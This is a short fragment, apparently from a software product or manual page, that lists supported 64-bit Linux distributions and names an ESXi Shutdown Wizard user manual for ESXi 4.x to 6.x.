Linux CentOS 5/ 6/ 7/ 8 (64bit)  
Linux Debian 6/ 7/ 8/ 10 (64bit)  
Linux Fedora 5/ 17/ 33 (64-bit)  
Linux Mint 19/ 20 (64bit)  
Linux OpenSUSE 10/ 11/ 12/ 13 (64bit)  
Linux RedHat Enterprise AS6 (64bit)  
Linux SUSE 10/ 11/ 12 (64bit)  
Linux Ubuntu 10/ 11/ 12/ 14/ 15/ 16/ 18/ 19/ 20 (64bit)  

Text mode operation:

ESXI Shutdown Wizard

User Manual

ESXI 4.x/ 5.x/6.x

Tag

#debian